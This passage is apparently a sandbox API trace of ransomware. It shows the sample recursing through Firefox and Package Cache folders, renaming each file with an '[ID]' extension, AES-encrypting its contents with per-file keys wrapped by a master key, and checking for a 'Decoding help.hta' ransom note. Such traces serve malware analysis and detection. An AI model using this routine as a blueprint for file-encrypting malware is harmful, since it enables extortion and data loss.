| out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.590] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="browser" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser" [0039.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" [0039.591] GlobalMemoryStatus (in: lpBuffer=0x750fd10 | out: lpBuffer=0x750fd10) [0039.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10880458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0039.595] CloseHandle (hObject=0x1e8) returned 1 [0039.595] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x24ca9180, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1ca70, dwReserved0=0x0, dwReserved1=0x0, cFileName="crashreporter.exe", cAlternateFileName="CRASHR~1.EXE")) returned 1 [0039.595] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.595] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" [0039.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta")) returned 0x1 [0039.596] lstrcmpiW (lpString1="Decoding help.hta", lpString2="crashreporter.exe") returned 1 [0039.596] lstrlenW (lpString="crashreporter.exe") returned 17 [0039.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0039.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0039.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="crashreporter.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" [0039.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" [0039.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0041.267] CreateFileMappingA (hFile=0x334, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0041.267] CryptAcquireContextA (in: phProv=0x750fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x750fcec*=0x3449930) returned 1 [0043.835] CryptGenKey (in: hProv=0x3449930, Algid=0x6610, dwFlags=0x1, phKey=0x750fce8 | out: phKey=0x750fce8*=0x5d8890) returned 1 [0043.835] CryptExportKey (in: hKey=0x5d8890, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x750fbe4, pdwDataLen=0x750fce4 | out: pbData=0x750fbe4*, pdwDataLen=0x750fce4*=0x2c) returned 1 [0043.835] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ca60) returned 0x6d90000 [0044.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x100) returned 1 [0047.266] CryptEncrypt (in: hKey=0x5d8890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6d90000, pdwDataLen=0x750fce4*=0x1ca60, dwBufLen=0x1ca60 | out: pbData=0x6d90000*, pdwDataLen=0x750fce4*=0x1ca60) returned 1 [0047.296] UnmapViewOfFile (lpBaseAddress=0x6d90000) returned 1 [0047.298] CloseHandle (hObject=0x454) returned 1 [0047.298] CryptDestroyKey (hKey=0x5d8890) returned 1 [0047.298] CryptReleaseContext (hProv=0x3449930, dwFlags=0x0) returned 1 [0047.298] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.298] WriteFile (in: hFile=0x334, lpBuffer=0x750fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x750fbe4*, lpNumberOfBytesWritten=0x750fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.451] WriteFile (in: hFile=0x334, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x750fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.452] CloseHandle (hObject=0x334) returned 1 [0050.400] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.657] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x45382300, ftLastWriteTime.dwHighDateTime=0x1ced1d1, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="crashreporter.ini", cAlternateFileName="CRASHR~1.INI")) returned 1 [0053.657] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0053.657] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0053.657] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" [0053.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\decoding help.hta")) returned 0x1 [0053.657] lstrcmpiW (lpString1="Decoding help.hta", lpString2="crashreporter.ini") returned 1 [0053.657] lstrlenW (lpString="crashreporter.ini") returned 17 [0053.657] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0053.657] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned 46 [0053.657] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="crashreporter.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" [0053.657] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" [0053.657] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0053.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0058.160] CreateFileMappingA (hFile=0x38c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0058.160] CryptAcquireContextA (in: phProv=0x750fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x750fcec*=0x3449e80) returned 1 [0060.182] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x750fce8 | out: phKey=0x750fce8*=0x42cf258) returned 1 [0060.182] CryptExportKey (in: hKey=0x42cf258, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x750fbe4, pdwDataLen=0x750fce4 | out: pbData=0x750fbe4*, pdwDataLen=0x750fce4*=0x2c) returned 1 [0060.182] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfa0) returned 0x3a60000 [0062.660] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x750fbe4*, pdwDataLen=0x750fcf8*=0x100) returned 1 [0062.660] CryptEncrypt (in: hKey=0x42cf258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a60000*, pdwDataLen=0x750fce4*=0xfa0, dwBufLen=0xfa0 | out: pbData=0x3a60000*, pdwDataLen=0x750fce4*=0xfa0) returned 1 [0062.663] UnmapViewOfFile (lpBaseAddress=0x3a60000) returned 1 [0062.665] CloseHandle (hObject=0x284) returned 1 [0062.665] CryptDestroyKey (hKey=0x42cf258) returned 1 [0062.665] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0062.665] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.665] WriteFile (in: hFile=0x38c, lpBuffer=0x750fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x750fbe4*, lpNumberOfBytesWritten=0x750fcf8*=0x100, lpOverlapped=0x0) returned 1 [0062.666] WriteFile (in: hFile=0x38c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x750fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x750fcf8*=0x500, lpOverlapped=0x0) returned 1 [0062.666] CloseHandle (hObject=0x38c) returned 1 [0062.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0062.676] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x750fd30 | out: lpFindFileData=0x750fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xfd9a7300, ftLastWriteTime.dwHighDateTime=0x1cafd02, nFileSizeHigh=0x0, nFileSizeLow=0x202368, dwReserved0=0x0, dwReserved1=0x0, cFileName="D3DCompiler_43.dll", cAlternateFileName="D3DCOM~1.DLL")) returned 1 Thread: id = 71 os_tid = 0xb50 [0039.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*.*", lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.557] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.564] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.564] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0039.564] lstrcmpW (lpString1=".", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned -1 [0039.564] lstrcmpW (lpString1="..", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned -1 [0039.564] lstrcmpiW (lpString1="windows", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 1 [0039.564] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.564] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0039.564] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" [0039.564] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cf0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.569] CloseHandle (hObject=0x18c) returned 1 [0039.569] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0039.569] lstrcmpW (lpString1=".", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned -1 [0039.569] lstrcmpW (lpString1="..", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned -1 [0039.569] lstrcmpiW (lpString1="windows", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 1 [0039.569] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.569] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.569] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0039.569] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" [0039.569] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d98800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.578] CloseHandle (hObject=0x18c) returned 1 [0039.578] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0039.578] lstrcmpW (lpString1=".", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned -1 [0039.578] lstrcmpW (lpString1="..", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned -1 [0039.578] lstrcmpiW (lpString1="windows", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 1 [0039.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.578] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.578] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0039.578] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" [0039.578] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5db0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.591] CloseHandle (hObject=0x18c) returned 1 [0039.591] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0039.591] lstrcmpW (lpString1=".", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned -1 [0039.591] lstrcmpW (lpString1="..", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned -1 [0039.591] lstrcmpiW (lpString1="windows", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 1 [0039.593] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.593] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0039.593] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0039.593] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108984c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.596] CloseHandle (hObject=0x18c) returned 1 [0039.597] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0039.597] lstrcmpW (lpString1=".", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned -1 [0039.597] lstrcmpW (lpString1="..", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned -1 [0039.597] lstrcmpiW (lpString1="windows", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 1 [0039.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.598] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.598] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" 